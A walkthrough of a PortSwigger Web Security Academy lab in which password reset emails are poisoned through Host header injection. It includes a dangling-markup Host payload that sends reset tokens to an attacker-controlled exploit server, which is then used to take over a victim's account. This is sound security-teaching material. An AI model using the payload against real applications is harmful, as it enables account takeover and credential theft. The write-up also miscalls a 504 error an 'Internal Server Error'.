Labs Covered

This write-up focuses on the following EXPERT-level lab from the PortSwigger Web Security Academy related to HTTP Host Header Attacks:

7 Password reset poisoning via dangling markup

This lab demonstrates how attackers can exploit dangling markup combined with unsanitized Host headers to poison password reset links and compromise user accounts.

---

LAB 7 - Password reset poisoning via dangling markup

Lab Description

Solution

Step-by-step Process

1. Trigger Password Reset for Wiener

• Go to the forgot password functionality as user wiener.
• Submit the request and intercept it using Burp Suite.

• Forward the request to initiate the password reset process.

  

2. Monitor Exploit Server for Reset Email

• Visit the Exploit Server provided by the lab.

• Click on the “Email Client” feature.

• You will see a reset password email for wiener that includes:

  • A reset link.

  • A temporary password or a clickable link to login.

    

3. Test Host Header Manipulation

• Go back to the forgot password request, and modify the Host header to something arbitrary (e.g., Host: evil.com).

• You will likely receive a 504 Internal Server Error — indicating that the application uses the Host header when generating the reset link.

  

4. Test with Exploit Server Domain

• Replace the Host header with your exploit server domain, such as:

  Host: exploit-0a0c00...exploit-server.net
  

• Submit the request — if successful, the password reset link will point to your server.

5. Testing with Arbitrary Port

• You can also test if the server accepts arbitrary ports in the Host header:

  Host: exploit-0a0c00...exploit-server.net:90
  

  

• If password still gets reset, it means the application is vulnerable and includes the full Host value (including port) in the reset link.

6. Injecting a Malicious Host Payload

• Try injecting the Host header with a URL-prefixed payload like:

      Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
  
  

• This format tricks the application into generating a password reset link that sends the token to your server.

7. Verify on Exploit Server

• Go to your exploit server’s access log or monitor incoming requests.

• You should see a request containing the reset token or temporary password.
• In this test, we are doing this for wiener — not carlos.

8. Login as Wiener

• Use the stolen reset token or password to log in as wiener.

  

• This confirms that the exploit works.

9. Repeat for Carlos

• Go back to the forgot password form and submit a reset request for carlos.

• Use the same Host header injection payload:

     Host: YOUR-LAB-ID.web-security-academy.net:'<a href="//YOUR-EXPLOIT-SERVER-ID.exploit-server.net/?
  
  

• Intercept and forward the request.

  

10. Extract Carlos’s Token

• Check your exploit server access logs.

• You should now see the reset link or password for carlos.

11. Log in as Carlos

• Use the password from the intercepted link to log in as carlos.
• Lab is successfully solved.

---